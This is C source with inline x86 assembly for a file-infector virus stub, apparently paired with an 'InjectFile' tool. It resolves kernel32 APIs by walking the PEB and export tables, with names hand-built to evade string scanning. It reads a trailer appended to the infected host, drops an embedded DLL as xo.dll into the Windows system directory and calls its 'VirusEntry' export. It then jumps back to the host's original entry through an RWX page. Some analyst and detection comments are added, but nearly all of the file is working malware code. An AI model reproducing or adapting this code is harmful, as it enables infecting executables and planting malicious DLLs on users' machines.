和InjectFile配套TestOne
//#include <iostream>
//using namespace std;
/*int Mystrcmp(const char* s1, const char* s2)
{
while((*s1 != '\0') || (*s2 != '\0')) {
if(*s1 != *s2){
return 0;
}
++s1;
++s2;
}
return 1;
}*/
#include <windows.h>
//#pragma comment(linker,"/sybsystem:console")
#pragma comment(linker, "/subsystem:WINDOWS")
#pragma comment(linker, "/ENTRY:EntryPoint")
/*
 * Trailer that the companion InjectFile tool (see the note at the top of this
 * file) appends to an infected host.  EntryPoint reads exactly sizeof(struct)
 * bytes from the end of its own image into this layout, so field order, sizes
 * and the absence of padding are part of the on-disk format - do not reorder.
 * For analysts: the constant vdll_flag value is a convenient trailer marker.
 */
struct InjectAppendStruct
{
BYTE szHeadBuf[8]; // 8 saved bytes from the host's entry ("head"); replayed by EntryPoint before jumping back
DWORD vDecHead_Offset; // file offset of those 8 bytes in the target
DWORD vDecHead_OriginalOEP; // target's original entry point (RVA; ImageBase is added at run time)
DWORD vDecHead_ImageBase; // target's image base
DWORD vown_Offset; // EXE file offset (as documented by the author; not read in this file)
DWORD vdll_Offset; // file offset of the embedded DLL inside the host
DWORD vdll_Size; // size of the embedded DLL in bytes
char vdll_flag[4]; // marker, documented as "ZMEP" (not validated in this file)
};
/*
 * Mystrcmp - minimal, case-sensitive string equality test (no libc dependency).
 *
 * @param s1  NUL-terminated string; must not be NULL.
 * @param s2  NUL-terminated string; must not be NULL.
 * @return 1 when both strings are byte-for-byte identical (including length),
 *         0 on the first differing byte or when one string ends before the other.
 *
 * Note the inverted convention relative to strcmp(): 1 means "equal".
 */
int Mystrcmp(const char* s1, const char* s2)
{
for (;; ++s1, ++s2) {
/* Both terminators reached together: every byte matched. */
if (*s1 == '\0' && *s2 == '\0') {
return 1;
}
/* A mismatch, or exactly one string ended: not equal. */
if (*s1 != *s2) {
return 0;
}
}
}
/*
 * SearchAPI - resolve an exported function by name from a module's export tables.
 *
 * @param BASE  module base address; all table entries are RVAs relative to it.
 * @param EAT   export address table (RVAs of the exported functions).
 * @param ENPT  export name pointer table (RVAs of the NUL-terminated names).
 * @param EOT   export ordinal table, parallel to ENPT; maps a name index to an
 *              index into EAT.
 * @param num   number of named exports (entries in ENPT / EOT).
 * @param name  export name to look for; compared case-sensitively.
 * @return address of the export, or 0 when no name matches.
 *
 * Inputs are taken on trust: nothing here verifies that EOT[index] stays within
 * EAT or that the tables belong to a valid PE image.  Walking export tables by
 * hand instead of calling GetProcAddress is a pattern worth flagging when seen
 * in an unknown binary.
 */
static void * __stdcall SearchAPI ( char *BASE, unsigned long *EAT, unsigned long *ENPT, unsigned short *EOT, unsigned long num, char *name )
{
unsigned long index = 0;
char *function_name = 0;
void *function_addr = 0;
for ( index = 0; index < num; index++ )
{
function_name = ENPT[index] + BASE;
/*
 * Case-sensitive comparison (1 == equal, see Mystrcmp).
 */
if ( 1 == Mystrcmp( function_name, name ) )
{
/* Name index -> ordinal -> address table slot. */
index = EOT[index];
function_addr = EAT[index] + BASE;
return( function_addr );
}
}
return 0;
}
/*
 * main - unused placeholder.  The real entry is EntryPoint, selected by the
 * "/ENTRY:EntryPoint" linker pragma above, so this body never runs.
 */
int main()
{
return 0;
}
/*
 * EntryPoint - custom program entry selected by the /ENTRY linker option above.
 *
 * What the visible code does (documented for analysis; 32-bit MSVC inline asm):
 *  1. Reads the PEB via fs:[0x30] and follows the loader module list to the
 *     entry it treats as kernel32.  The list position is assumed, not checked
 *     by name, so this presumably only holds on the Windows versions the
 *     author targeted - TODO confirm.  It then walks kernel32's export
 *     directory and resolves LoadLibraryA / GetProcAddress and a set of file,
 *     memory and process APIs by name through SearchAPI.  API names are
 *     assembled byte by byte on the stack; note that several arrays are also
 *     initialised from string literals, so those names still appear in the
 *     binary as plain strings.
 *  2. Opens its own image (GetModuleFileNameA), reads an InjectAppendStruct
 *     trailer from the end of the file and copies it to "test.txt".
 *  3. Extracts the embedded DLL (offset and size from the trailer) to
 *     <system directory>\xo.dll, loads it and calls its "VirusEntry" export.
 *  4. Copies the host's 8 saved entry bytes into a freshly allocated RWX page,
 *     appends a jmp back towards the original entry point and jumps there.
 *
 * Detection notes: a file drop into the system directory, a self-read of the
 * running image from its tail, a PAGE_EXECUTE_READWRITE allocation followed by
 * a jmp into it, and the trailer layout of InjectAppendStruct are all
 * observable artefacts of this stub.
 *
 * Returns 0 only on the fall-through path (CreateFileA not resolved); after
 * the final jmp the function never returns.
 */
int EntryPoint()
{
void *PEB = 0,
*Ldr = 0,
*Flink = 0,
*kernel32_BaseAddress = 0,
*kernel32_BaseDllName = 0,
*ExportDirectory = 0,
*PrivateLoadLibraryA = 0,
*PrivateGetProcAddress = 0;
unsigned long NumberOfNames = 0,
*AddressOfFunctions = 0,
*AddressOfNames = 0;
unsigned short *AddressOfNameOrdinals = 0;
long e_lfanew = 0;
/* PEB -> Ldr -> module list -> presumed kernel32 base, then its export directory. */
__asm
{
mov eax,fs:[0x30]
mov PEB,eax
mov eax,[eax+0ch]
mov Ldr,eax
mov esi,[eax+1ch];
mov Flink, esi;
mov ebx,[esi] ;Flink???
lodsd
mov edx, [eax + 8]
mov kernel32_BaseAddress,edx
mov ebx,[ebx+20h]
mov kernel32_BaseDllName,ebx
;locate the export directory so GetProcAddress / LoadLibraryA can be resolved by name
mov ebx, kernel32_BaseAddress;
mov eax, [ebx+3Ch]
mov e_lfanew,eax
mov eax, kernel32_BaseAddress
mov edx,eax
mov ebx, e_lfanew;
add ebx, 078h
mov eax,[eax+ebx]
add eax,edx
mov ExportDirectory,eax
mov ecx,eax
mov eax,[eax+018h]
mov NumberOfNames,eax
mov eax,ExportDirectory;
mov eax,[eax+01Ch]
mov edx, kernel32_BaseAddress
add eax,edx
mov AddressOfFunctions,eax
mov eax,ExportDirectory;
mov eax,[eax+020h]
add eax,edx
mov AddressOfNames,eax
mov eax,ExportDirectory;
mov eax,[eax+024h];
add eax,edx
mov AddressOfNameOrdinals,eax
}
/*printf("PEB = 0x%08X\n", PEB );
printf("Ldr = 0x%08X\n", Ldr);
printf("Flink = 0x%08X\n", Flink);
printf("kernel32_BaseAddress = 0x%08X\n", kernel32_BaseAddress);
wprintf(L"kernel32_BAseDllName = %s\n", kernel32_BaseDllName);
printf("e_lfanew = 0x%08X\n", e_lfanew);
printf("ExportDirectory = 0x%08X\n", ExportDirectory);
printf("NumberOfNames = %u\n", NumberOfNames);
printf("AddressOfFunctions = 0x%08X\n", AddressOfFunctions);
printf("AddressOfNames = 0x%08X\n", AddressOfNames);
printf("AddressOfNameOrdinals = 0x%08X\n", AddressOfNameOrdinals);*/
///=======================================================
/* API names built one byte at a time (keeps them out of the string table). */
char szFuncLoadLibrary[13];
szFuncLoadLibrary[0] = 'L';
szFuncLoadLibrary[1] = 'o';
szFuncLoadLibrary[2] = 'a';
szFuncLoadLibrary[3] = 'd';
szFuncLoadLibrary[4] = 'L';
szFuncLoadLibrary[5] = 'i';
szFuncLoadLibrary[6] = 'b';
szFuncLoadLibrary[7] = 'r';
szFuncLoadLibrary[8] = 'a';
szFuncLoadLibrary[9] = 'r';
szFuncLoadLibrary[10] = 'y';
szFuncLoadLibrary[11] = 'A';
szFuncLoadLibrary[12] = '\0';
char szFuncGetProcAddress[15];
szFuncGetProcAddress[0] = 'G';
szFuncGetProcAddress[1] = 'e';
szFuncGetProcAddress[2] = 't';
szFuncGetProcAddress[3] = 'P';
szFuncGetProcAddress[4] = 'r';
szFuncGetProcAddress[5] = 'o';
szFuncGetProcAddress[6] = 'c';
szFuncGetProcAddress[7] = 'A';
szFuncGetProcAddress[8] = 'd';
szFuncGetProcAddress[9] = 'd';
szFuncGetProcAddress[10] = 'r';
szFuncGetProcAddress[11] = 'e';
szFuncGetProcAddress[12] = 's';
szFuncGetProcAddress[13] = 's';
szFuncGetProcAddress[14] = '\0';
// Resolve LoadLibraryA and GetProcAddress from kernel32's export tables (SearchAPI).
PrivateLoadLibraryA = SearchAPI
(
(char*)kernel32_BaseAddress,
AddressOfFunctions,
AddressOfNames,
AddressOfNameOrdinals,
NumberOfNames,
szFuncLoadLibrary
);
//printf( "PrivateLoadLibraryA = 0x%08X\n", PrivateLoadLibraryA );
//printf( "LoadLibraryA = 0x%08X\n", LoadLibraryA );
PrivateGetProcAddress = SearchAPI
(
(char*)kernel32_BaseAddress,
AddressOfFunctions,
AddressOfNames,
AddressOfNameOrdinals,
NumberOfNames,
szFuncGetProcAddress
);
//printf( "PrivateGetProcAddress = 0x%08X\n", PrivateGetProcAddress );
//printf( "GetProcAddress = 0x%08X\n", GetProcAddress );
/*unsigned long index = 0;
char *function_name = 0;
void *function_addr = 0;
for ( index = 0; index < NumberOfNames; index++ )
{
function_name = AddressOfNames[index] + (char*)kernel32_BaseAddress;
//
// ???????
//
//Mystrcmp比较字符串
int tmp_strcmp = 1;
char* s1 = function_name;
char* s2 = szFuncLoadLibrary;
while((*s1 != '\0') || (*s2 != '\0')) {
if(*s1 != *s2){
tmp_strcmp = 0;
break;
}
s1++;
s2++;
}
if ( 0 != tmp_strcmp )
{
index = AddressOfNameOrdinals[index];
function_addr = AddressOfFunctions[index] + (char*)kernel32_BaseAddress;
break;
}
}*/
//??API
/*PrivateLoadLibraryA = SearchAPI
(
(char*)kernel32_BaseAddress,
AddressOfFunctions,
AddressOfNames,
AddressOfNameOrdinals,
NumberOfNames,
"LoadLibraryA"
);*/
//PrivateLoadLibraryA = function_addr;
//printf( "PrivateLoadLibraryA = 0x%08X\n", PrivateLoadLibraryA );
/*for ( index = 0; index < NumberOfNames; index++ )
{
function_name = AddressOfNames[index] + (char*)kernel32_BaseAddress;
//
// ???????
//
//比较字符串
int tmp_strcmp = 1;
char* s1 = function_name;
char* s2 = szFuncGetProcAddress;
while((*s1 != '\0') || (*s2 != '\0')) {
if(*s1 != *s2){
tmp_strcmp = 0;
break;
}
s1++;
s2++;
}
if ( 0 != tmp_strcmp )
{
index = AddressOfNameOrdinals[index];
function_addr = AddressOfFunctions[index] + (char*)kernel32_BaseAddress;
break;
}
} */
//PrivateGetProcAddress = function_addr;
/*PrivateGetProcAddress = SearchAPI
(
(char*)kernel32_BaseAddress,
AddressOfFunctions,
AddressOfNameOrdinals,
AddressOfNames,
NumberOfNames,
"GetProcAddress"
);
*/
//printf( "PrivateGetProcAddress = 0x%08X\n", PrivateGetProcAddress );
// File, memory and process APIs resolved by export name below.
// (Several of these arrays are also initialised from literals, so the names
// remain visible in the binary despite the byte-wise assignment.)
void* v_CreateFileA = 0;
void* v_ReadFile = 0;
void* v_WriteFile = 0;
void* v_SetFilePointer = 0;
void* v_GetModuleFileName = 0;
void* v_CloseHandle = 0;
void* v_VirtualAlloc = 0;
void* v_VirtualFree = 0;
void* v_GetSystemDirectoryA = 0;
void* v_MoveFileA = 0;
void* v_lstrcat = 0;
void* v_GetCurrentProcessId = 0;
void* v_OpenProcess = 0;
void* v_WriteProcessMemory = 0;
void* v_lstrcpyn = 0;
char szCreateFileA[12] = "CreateFileA";
szCreateFileA[0] = 'C';
szCreateFileA[1] = 'r';
szCreateFileA[2] = 'e';
szCreateFileA[3] = 'a';
szCreateFileA[4] = 't';
szCreateFileA[5] = 'e';
szCreateFileA[6] = 'F';
szCreateFileA[7] = 'i';
szCreateFileA[8] = 'l';
szCreateFileA[9] = 'e';
szCreateFileA[10] = 'A';
szCreateFileA[11] = '\0';
char szReadFile[9] = "ReadFile";
szReadFile[0] = 'R';
szReadFile[1] = 'e';
szReadFile[2] = 'a';
szReadFile[3] = 'd';
szReadFile[4] = 'F';
szReadFile[5] = 'i';
szReadFile[6] = 'l';
szReadFile[7] = 'e';
szReadFile[8] = '\0';
char szWriteFile[14] = "WriteFile";
szWriteFile[0] = 'W';
szWriteFile[1] = 'r';
szWriteFile[2] = 'i';
szWriteFile[3] = 't';
szWriteFile[4] = 'e';
szWriteFile[5] = 'F';
szWriteFile[6] = 'i';
szWriteFile[7] = 'l';
szWriteFile[8] = 'e';
szWriteFile[9] = '\0';
char szSetFilePointer[15] = "SetFilePointer";
szSetFilePointer[0] = 'S';
szSetFilePointer[1] = 'e';
szSetFilePointer[2] = 't';
szSetFilePointer[3] = 'F';
szSetFilePointer[4] = 'i';
szSetFilePointer[5] = 'l';
szSetFilePointer[6] = 'e';
szSetFilePointer[7] = 'P';
szSetFilePointer[8] = 'o';
szSetFilePointer[9] = 'i';
szSetFilePointer[10] = 'n';
szSetFilePointer[11] = 't';
szSetFilePointer[12] = 'e';
szSetFilePointer[13] = 'r';
szSetFilePointer[14] = '\0';
char szGetModuleFileName[19];
szGetModuleFileName[0] = 'G';
szGetModuleFileName[1] = 'e';
szGetModuleFileName[2] = 't';
szGetModuleFileName[3] = 'M';
szGetModuleFileName[4] = 'o';
szGetModuleFileName[5] = 'd';
szGetModuleFileName[6] = 'u';
szGetModuleFileName[7] = 'l';
szGetModuleFileName[8] = 'e';
szGetModuleFileName[9] = 'F';
szGetModuleFileName[10] = 'i';
szGetModuleFileName[11] = 'l';
szGetModuleFileName[12] = 'e';
szGetModuleFileName[13] = 'N';
szGetModuleFileName[14] = 'a';
szGetModuleFileName[15] = 'm';
szGetModuleFileName[16] = 'e';
szGetModuleFileName[17] = 'A';
szGetModuleFileName[18] = '\0';
char szCloseHandle[12] = "CloseHandle";
szCloseHandle[0] = 'C';
szCloseHandle[1] = 'l';
szCloseHandle[2] = 'o';
szCloseHandle[3] = 's';
szCloseHandle[4] = 'e';
szCloseHandle[5] = 'H';
szCloseHandle[6] = 'a';
szCloseHandle[7] = 'n';
szCloseHandle[8] = 'd';
szCloseHandle[9] = 'l';
szCloseHandle[10] = 'e';
szCloseHandle[11] = '\0';
char szVirtualAlloc[13] = "VirtualAlloc";
szVirtualAlloc[0] = 'V';
szVirtualAlloc[1] = 'i';
szVirtualAlloc[2] = 'r';
szVirtualAlloc[3] = 't';
szVirtualAlloc[4] = 'u';
szVirtualAlloc[5] = 'a';
szVirtualAlloc[6] = 'l';
szVirtualAlloc[7] = 'A';
szVirtualAlloc[8] = 'l';
szVirtualAlloc[9] = 'l';
szVirtualAlloc[10] = 'o';
szVirtualAlloc[11] = 'c';
szVirtualAlloc[12] = '\0';
char szVirtualFree[12] = "VirtualFree";
szVirtualFree[0] = 'V';
szVirtualFree[1] = 'i';
szVirtualFree[2] = 'r';
szVirtualFree[3] = 't';
szVirtualFree[4] = 'u';
szVirtualFree[5] = 'a';
szVirtualFree[6] = 'l';
szVirtualFree[7] = 'F';
szVirtualFree[8] = 'r';
szVirtualFree[9] = 'e';
szVirtualFree[10] = 'e';
szVirtualFree[11] = '\0';
char szGetSystemDirectoryA[20];
szGetSystemDirectoryA[0] = 'G';
szGetSystemDirectoryA[1] = 'e';
szGetSystemDirectoryA[2] = 't';
szGetSystemDirectoryA[3] = 'S';
szGetSystemDirectoryA[4] = 'y';
szGetSystemDirectoryA[5] = 's';
szGetSystemDirectoryA[6] = 't';
szGetSystemDirectoryA[7] = 'e';
szGetSystemDirectoryA[8] = 'm';
szGetSystemDirectoryA[9] = 'D';
szGetSystemDirectoryA[10] = 'i';
szGetSystemDirectoryA[11] = 'r';
szGetSystemDirectoryA[12] = 'e';
szGetSystemDirectoryA[13] = 'c';
szGetSystemDirectoryA[14] = 't';
szGetSystemDirectoryA[15] = 'o';
szGetSystemDirectoryA[16] = 'r';
szGetSystemDirectoryA[17] = 'y';
szGetSystemDirectoryA[18] = 'A';
szGetSystemDirectoryA[19] = '\0';
char szMoveFileA[10];
szMoveFileA[0] = 'M';
szMoveFileA[1] = 'o';
szMoveFileA[2] = 'v';
szMoveFileA[3] = 'e';
szMoveFileA[4] = 'F';
szMoveFileA[5] = 'i';
szMoveFileA[6] = 'l';
szMoveFileA[7] = 'e';
szMoveFileA[8] = 'A';
szMoveFileA[9] = '\0';
char szlstrcat[12];
szlstrcat[0] = 'l';
szlstrcat[1] = 's';
szlstrcat[2] = 't';
szlstrcat[3] = 'r';
szlstrcat[4] = 'c';
szlstrcat[5] = 'a';
szlstrcat[6] = 't';
szlstrcat[7] = '\0';
char szGetCurrentProcessId[20] = "GetCurrentProcessId";
szGetCurrentProcessId[0] = 'G';
szGetCurrentProcessId[1] = 'e';
szGetCurrentProcessId[2] = 't';
szGetCurrentProcessId[3] = 'C';
szGetCurrentProcessId[4] = 'u';
szGetCurrentProcessId[5] = 'r';
szGetCurrentProcessId[6] = 'r';
szGetCurrentProcessId[7] = 'e';
szGetCurrentProcessId[8] = 'n';
szGetCurrentProcessId[9] = 't';
szGetCurrentProcessId[10] = 'P';
szGetCurrentProcessId[11] = 'r';
szGetCurrentProcessId[12] = 'o';
szGetCurrentProcessId[13] = 'c';
szGetCurrentProcessId[14] = 'e';
szGetCurrentProcessId[15] = 's';
szGetCurrentProcessId[16] = 's';
szGetCurrentProcessId[17] = 'I';
szGetCurrentProcessId[18] = 'd';
szGetCurrentProcessId[19] = '\0';
char szWriteProcessMemory[19] = "WriteProcessMemory";
szWriteProcessMemory[0] = 'W';
szWriteProcessMemory[1] = 'r';
szWriteProcessMemory[2] = 'i';
szWriteProcessMemory[3] = 't';
szWriteProcessMemory[4] = 'e';
szWriteProcessMemory[5] = 'P';
szWriteProcessMemory[6] = 'r';
szWriteProcessMemory[7] = 'o';
szWriteProcessMemory[8] = 'c';
szWriteProcessMemory[9] = 'e';
szWriteProcessMemory[10] = 's';
szWriteProcessMemory[11] = 's';
szWriteProcessMemory[12] = 'M';
szWriteProcessMemory[13] = 'e';
szWriteProcessMemory[14] = 'm';
szWriteProcessMemory[15] = 'o';
szWriteProcessMemory[16] = 'r';
szWriteProcessMemory[17] = 'y';
szWriteProcessMemory[18] = '\0';
char szOpenProcess[19] = "OpenProcess";
szOpenProcess[0] = 'O';
szOpenProcess[1] = 'p';
szOpenProcess[2] = 'e';
szOpenProcess[3] = 'n';
szOpenProcess[4] = 'P';
szOpenProcess[5] = 'r';
szOpenProcess[6] = 'o';
szOpenProcess[7] = 'c';
szOpenProcess[8] = 'e';
szOpenProcess[9] = 's';
szOpenProcess[10] = 's';
szOpenProcess[11] = '\0';
char szlstrcpyn[9];
szlstrcpyn[0] = 'l';
szlstrcpyn[1] = 's';
szlstrcpyn[2] = 't';
szlstrcpyn[3] = 'r';
szlstrcpyn[4] = 'c';
szlstrcpyn[5] = 'p';
szlstrcpyn[6] = 'y';
szlstrcpyn[7] = 'n';
szlstrcpyn[8] = '\0';
v_CreateFileA = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szCreateFileA);
v_ReadFile = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szReadFile);
v_WriteFile = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szWriteFile);
v_SetFilePointer = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szSetFilePointer);
v_GetModuleFileName = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szGetModuleFileName);
v_CloseHandle = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szCloseHandle);
v_VirtualAlloc = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szVirtualAlloc);
v_VirtualFree = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szVirtualFree);
v_GetSystemDirectoryA = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szGetSystemDirectoryA);
v_MoveFileA = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szMoveFileA);
v_lstrcat = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szlstrcat);
v_GetCurrentProcessId = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szGetCurrentProcessId);
v_WriteProcessMemory = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szWriteProcessMemory);
v_OpenProcess = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szOpenProcess);
v_lstrcpyn = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szlstrcpyn);
//printf("v_C: 0x%X\n", v_CreateFileA);
//printf("v_R: 0x%X\n", v_ReadFile);
//printf("v_W: 0x%X\n", v_WriteFile);
//printf("v_S: 0x%X\n", v_SetFilePointer);
//printf("v_G: 0x%X\n", v_GetModuleFileName);
// File I/O section.  Only v_CreateFileA is checked; the other resolved
// pointers are called unconditionally inside the block.
const int bufSize = 260;
char szFileName[bufSize];
if(v_CreateFileA)
{
__asm
{
push bufSize;
lea eax, szFileName;
push eax;
push 0;
call v_GetModuleFileName; path of the running image (the infected host)
}
// Create the files
int fileAttribute = FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN;
char szText[9];
szText[0] = 't';
szText[1] = 'e';
szText[2] = 's';
szText[3] = 't';
szText[4] = '.';
szText[5] = 't';
szText[6] = 'x';
szText[7] = 't';
szText[8] = '\0';
InjectAppendStruct tmpAStruc; // appended trailer; read from the end of the host file
void* hWrite = 0;
void* hRead = 0;
// Create the output file (test.txt) for writing
__asm
{
push 0;
push fileAttribute;
push CREATE_ALWAYS;
push 0;
push 0;
push GENERIC_WRITE;
lea ebx, szText;
push ebx;
call v_CreateFileA;
mov hWrite, eax;
}
// Open the running image itself for reading
__asm
{
push 0;
push fileAttribute;
push OPEN_ALWAYS;
push 0;
push 0;
push GENERIC_READ;
lea ebx, szFileName;
push ebx;
call v_CreateFileA;
mov hRead, eax;
}
// Read the trailer and copy it out
DWORD ReadNum = 0;
DWORD ReadttenNum = 0;
DWORD AppendStrucSize = sizeof(tmpAStruc);
AppendStrucSize = -AppendStrucSize;
// Position the read pointer sizeof(trailer) bytes before end of file
__asm
{
push FILE_END; // move method
push 0;
push AppendStrucSize; // byte offset (negative)
push hRead;
call v_SetFilePointer;
}
AppendStrucSize = -AppendStrucSize;
// Read the trailer from the host, then write it to test.txt
__asm
{
push 0;
lea ebx, ReadttenNum;
push ebx;
push AppendStrucSize;
lea ebx, tmpAStruc;
push ebx;
push hRead;
call v_ReadFile;
}
__asm
{
push 0;
lea ebx, ReadttenNum;
push ebx;
push AppendStrucSize;
lea ebx, tmpAStruc;
push ebx;
push hWrite;
call v_WriteFile;
}
// Extract the embedded DLL and write it out as a file.
// A 260-byte buffer is enough for a path like C:\\Windows\System32\xo.dll.
void* hDLL = 0;
char szDLLName[260];
szDLLName[0] = 'x';
szDLLName[1] = 'o';
szDLLName[2] = '.';
szDLLName[3] = 'd';
szDLLName[4] = 'l';
szDLLName[5] = 'l';
szDLLName[6] = '\0';
// Get the system directory ...
// ... and append "\xo.dll" (the dropped path is a detection artefact)
char szSysDirBuf[260];
char szAfterDLLName[8];
szAfterDLLName[0] = '\\';
szAfterDLLName[1] = 'x';
szAfterDLLName[2] = 'o';
szAfterDLLName[3] = '.';
szAfterDLLName[4] = 'd';
szAfterDLLName[5] = 'l';
szAfterDLLName[6] = 'l';
szAfterDLLName[7] = '\0';
__asm
{
push 260;
lea ebx, szSysDirBuf;
push ebx;
call v_GetSystemDirectoryA;
lea ebx, szAfterDLLName;
push ebx;
lea ebx, szSysDirBuf;
push ebx;
call v_lstrcat;
}
// user32.dll is loaded via the resolved LoadLibraryA to fetch MessageBoxA
// and wsprintfA; neither pointer is used on the live path below.
int hModule = 0;
char szBuf[11];
szBuf[0] = 'u';
szBuf[1] = 's';
szBuf[2] = 'e';
szBuf[3] = 'r';
szBuf[4] = '3';
szBuf[5] = '2';
szBuf[6] = '.';
szBuf[7] = 'd';
szBuf[8] = 'l';
szBuf[9] = 'l';
szBuf[10] = '\0';
char szMessage[12];
szMessage[0] = 'M';
szMessage[1] = 'e';
szMessage[2] = 's';
szMessage[3] = 's';
szMessage[4] = 'a';
szMessage[5] = 'g';
szMessage[6] = 'e';
szMessage[7] = 'B';
szMessage[8] = 'o';
szMessage[9] = 'x';
szMessage[10] = 'A';
szMessage[11] = '\0';
char szwsprintfA[10];
szwsprintfA[0] = 'w';
szwsprintfA[1] = 's';
szwsprintfA[2] = 'p';
szwsprintfA[3] = 'r';
szwsprintfA[4] = 'i';
szwsprintfA[5] = 'n';
szwsprintfA[6] = 't';
szwsprintfA[7] = 'f';
szwsprintfA[8] = 'A';
szwsprintfA[9] = '\0';
void* v_MessageBox = 0;
void* v_wsprintfA = 0;
__asm
{
//mov eax,PrivateLoadLibraryA;
//mov ebx,PrivateGetProcAddress;
lea ecx,szBuf;
push ecx;
call PrivateLoadLibraryA;
mov hModule,eax
lea ecx,szMessage
push ecx
push hModule;
call PrivateGetProcAddress;
mov v_MessageBox, eax; // MessageBoxA pointer
// eax has been clobbered by the call above
lea ecx, szwsprintfA;
push ecx;
push hModule;
call PrivateGetProcAddress;
mov v_wsprintfA, eax;
}
// Create xo.dll in the system directory
__asm
{
push 0;
push fileAttribute;
push CREATE_ALWAYS;
push 0;
push 0;
push GENERIC_WRITE;
lea ebx, szSysDirBuf;
push ebx;
call v_CreateFileA;
mov hDLL, eax;
}
// Allocate a buffer for the DLL image and seek to its offset in the host file
BYTE *dllBuf = 0;
void *lpDLL = 0;
__asm
{
push PAGE_READWRITE;
push MEM_COMMIT;
push tmpAStruc.vdll_Size;
push 0;
call v_VirtualAlloc;
mov lpDLL, eax;
}
__asm
{
push FILE_BEGIN; // move method
push 0;
push tmpAStruc.vdll_Offset; // byte offset of the DLL inside the host file
push hRead;
call v_SetFilePointer;
}
// Read the DLL bytes out of the host file
__asm
{
push 0;
lea ebx, ReadttenNum;
push ebx;
push tmpAStruc.vdll_Size; // bytes to read
push lpDLL; // destination buffer
push hRead;
call v_ReadFile;
}
// Write them to xo.dll
__asm
{
push 0;
lea ebx, ReadttenNum;
push ebx;
push tmpAStruc.vdll_Size;
push lpDLL;
push hDLL;
call v_WriteFile;
}
// Close the file handles and release the buffer
__asm
{
push hDLL;
call v_CloseHandle;
push hWrite;
call v_CloseHandle;
push hRead;
call v_CloseHandle;
//VirtualFree
push MEM_RELEASE;
push 0;
push lpDLL;
call v_VirtualFree;
}
//szDLLName
char szDLLEntry[11] = "VirusEntry";
szDLLEntry[0] = 'V';
szDLLEntry[1] = 'i';
szDLLEntry[2] = 'r';
szDLLEntry[3] = 'u';
szDLLEntry[4] = 's';
szDLLEntry[5] = 'E';
szDLLEntry[6] = 'n';
szDLLEntry[7] = 't';
szDLLEntry[8] = 'r';
szDLLEntry[9] = 'y';
szDLLEntry[10] = '\0';
// Load the extracted xo.dll and call its VirusEntry export (return value
// of GetProcAddress is not checked before the call).
int hDLLHDL = 0;
__asm
{
lea ebx, szDLLName;
push ebx;
call PrivateLoadLibraryA;
mov hDLLHDL, eax;
lea ebx, szDLLEntry;
push ebx;
push hDLLHDL;
call PrivateGetProcAddress;
call eax;
//load wsprintfA
}
// Transfer back to the host: replay its saved entry bytes from an RWX page.
// (Author's earlier plan, kept for reference: VirtualAlloc, copy via RtlFillMemory, VirtualFree.)
void* opHeadCode = NULL;
BYTE szopHeadBuf[260];
BYTE sztmpopBuf[4] = {0};
sztmpopBuf[0] = '\xE9';
DWORD opHeadCodeSize = sizeof(tmpAStruc.szHeadBuf);
DWORD jmpOPOffset = tmpAStruc.vDecHead_OriginalOEP + tmpAStruc.vDecHead_ImageBase + 5;
__asm
{
push PAGE_EXECUTE_READWRITE;
push MEM_COMMIT;
push 0x01000; // 4 KB
push 0;
call v_VirtualAlloc;
mov opHeadCode, eax;
}
__asm
{
// compute the rel32 operand of the jmp (eax still holds opHeadCode here)
add eax, 0x05;
mov ebx, jmpOPOffset;
sub ebx, eax;
sub ebx, 0x05;
//mov eax, tmpAStruc.vDecHead_ImageBase;
//add ebx, eax;
mov jmpOPOffset, ebx;
}
__asm
{
// copy the 8 saved header bytes (two dword moves)
lea ebx, tmpAStruc.szHeadBuf;
mov eax, [ebx];
mov edx, opHeadCode;
mov [edx], eax;
mov eax, [ebx+4];
mov [edx+4], eax;
// zero the byte after the copy (operand size left implicit in the original)
mov eax, opHeadCode;
mov [eax+8], 0;
// write the 0xE9 opcode at offset 5 and its rel32 at offset 6, so only the
// first 5 saved bytes execute before the jmp (see jmpOPOffset above)
lea ebx, sztmpopBuf;
mov edx, [ebx];
mov [eax+5], edx;
mov edx, jmpOPOffset;
mov [eax+6], edx;
}
// Control leaves this function here; the code below is never reached.
__asm
{
jmp opHeadCode;
}
//wsprintf(szHeadOPBuf, "E9%d", &jmpOPOffset);
//lstrcat(opHeadCode, szHeadOPBuf);
/*
// MessageBox call (disabled)
__asm
{
lea ecx, szSysDirBuf
push 0
push ecx
push ecx
push 0
call v_MessageBox
}
*/
}
return 0;
}